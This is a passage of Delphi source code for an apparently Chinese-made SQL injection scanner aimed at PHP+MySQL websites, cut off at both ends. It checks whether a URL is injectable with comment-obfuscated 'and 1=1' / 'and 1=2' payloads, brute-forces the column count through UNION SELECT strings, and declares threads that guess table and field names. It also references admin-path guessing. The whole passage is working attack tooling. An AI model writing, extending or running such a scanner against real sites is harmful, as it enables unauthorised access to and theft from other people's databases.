PHP+MYSQL网站注入扫描[10]

;
    end;
  end;
  mm.lines.add('');
  mm.lines.add('后台路径猜解结束。。。');
except
end; }
end;

procedure tform1.listbox1click(sender: tobject);
begin
wb.navigate(listbox1.items.gettext);
pcphpinj.activepageindex :=3;
end;

procedure tform1.formshow(sender: tobject);
begin
pg1 :=tprogressbar.create(nil);
pg1.parent :=statusbar1;
pg1.height :=statusbar1.height;
pg1.width :=statusbar1.width;
pg1.visible :=false;
end;

end.


unit unit2;

interface

uses
classes,stdctrls,windows,sysutils,comctrls,idhttp;

var
cs:trtlcriticalsection;   //定义全局临界区

type
//扫描网站是否可以注入及当前注入点对应表字段数线程类
scanthread = class(tthread)
protected
  furl,injurl,fstr: string; //要注入的网站地址
  fkeyword: string; //关键字
  fstate: boolean;
  fmemo: tmemo;
  flistview: tlistview;
  fnum: integer;
  ftable,fvalue :string;
  procedure execute; override;
public
  //constructor create(url,keyword:string;memo:tmemo);
end;
//扫描表段注入线程类
scantablethread = class(scanthread)
private
  procedure scantableresult;
protected
  procedure execute; override;
public
  constructor create(url,str,keyword:string;memo:tmemo;listview:tlistview);
end;
//扫描字段注入线程类
scanfieldthread = class(scanthread)
private
  procedure scanfieldresult;
protected
  procedure execute; override;
public
  constructor create(url,str,keyword,table:string;num:integer;memo:tmemo;listview:tlistview);
end;

function get(url,key: string): boolean;

var
stoped:boolean;

implementation

uses unit1;

function get(url,key: string): boolean;
var
idhttp: tidhttp;
ss: string;
begin
result:= false;
idhttp:= tidhttp.create(nil);
try
  try
    idhttp.handleredirects:= true;   //必须支持重定向否则可能出错
    idhttp.readtimeout:= 30000;     //超过这个时间则不再访问
    ss:= idhttp.get(url);
    if key='' then
    begin
    if idhttp.responsecode=200 then
      result :=true;
    end else
    begin
    if (idhttp.responsecode=200) and (pos(key,ss)>0) then
      result :=true;
    end;
  except
  end;
finally
  idhttp.free;
end;
end;

{constructor scanthread.create(url,keyword:string;memo:tmemo);
begin
fmemo :=memo;
furl :=url;
fkeyword :=keyword;
freeonterminate := true; // 自动删除
inherited create(false); // 直接运行
end;}

procedure scanthread.execute;
var
i:integer;
istr:string;
begin
fmemo :=form1.mm;
furl :=trim(form1.edtinjurl.text);
fkeyword :=trim(form1.edtkey.text);
fmemo.lines.clear;
fmemo.lines.add('正在检测注入点是否可用。。。');
if (not get(furl,'')) or (not get(furl+'/**/and/**/1=1/*',''))
    or (not get(furl+'/**/and/**/1=2/*','')) then
begin
  fmemo.lines.add('注入点不可用，猜解终止！');
  exit;
end;
//开始猜解字段数目
i:=1;
istr:='1';
fstate :=false;
fmemo.lines.add('');
fmemo.lines.add('开始猜解字段数目。。。');
fmemo.lines.add('');
while not fstate do
begin
  inc(i);
  if i>30 then
  begin
    fmemo.lines.add('最大猜解字段数大于30,猜解终止！');
    fstate :=true;
    exit;
  end;
  istr:=istr+','+inttostr(i);
  injurl :=furl+'/**/and/**/1=1/**/union/**/select/**/'+istr+'/*';
  fmemo.lines.add(injurl);
  if get(injurl,fkeyword) then
  begin
    fstate :=true;
    fmemo.lines.add('');
    fmemo.lines.add('字段数目猜解结束！共找到'+inttostr(i)+'个字段。');
    form1.edtfieldnum.text :=inttostr(i);
    form1.spnum.maxvalue :=i;
    form1.spnum.text :=inttostr(i);
    form1.spfield1.maxvalue :=i;
    form1.spfield2.maxvalue :=i;
    exit;
  end;
end;
end;

constructor scantablethread.create(url,str,keyword:string;memo:tmemo;listview:tlistview);
begin
flistview :=listview;
fmemo :=memo;
furl :=url;
fkeyword :=keyword;
fstr :=str;
freeonterminate := true; // 自动删除
initializecriticalsection(cs); //初始化临界区
//inherited create(furl,fkeyword,fmemo); // 直接运行
inherited create(false);
end;

procedure scantablethread.scantableresult;
begin
with flistview.items.add do
begin
  caption :=inttostr(flistview.items.count);
  subitems.add(fvalue);
end;
end;

//在一个线程内完成表段猜解工作
procedure scantablethread.execute;
var i: